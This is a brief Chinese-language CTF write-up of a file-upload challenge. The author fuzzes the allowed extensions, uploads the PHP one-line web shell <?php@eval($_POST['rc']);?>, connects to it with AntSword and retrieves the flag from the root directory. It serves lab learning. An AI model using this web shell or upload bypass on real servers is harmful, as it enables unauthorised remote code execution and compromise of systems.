打开靶机后发现是一个文件上传的题目随便上传一个文件观察路径和返回的方式是什么发现只能上传jpg,png,gif的文件上传一个jpg文件发现页面会回显返回的路径既然有路径了我们就可以尝试上传一句话木马了构造一句话木马<?php@eval($_POST['rc']);?>导入字典观察过滤的哪些后缀发现基本都没过滤那就找到返回最长的发送过去上传成功蚁剑连接在根目录中便可找到flag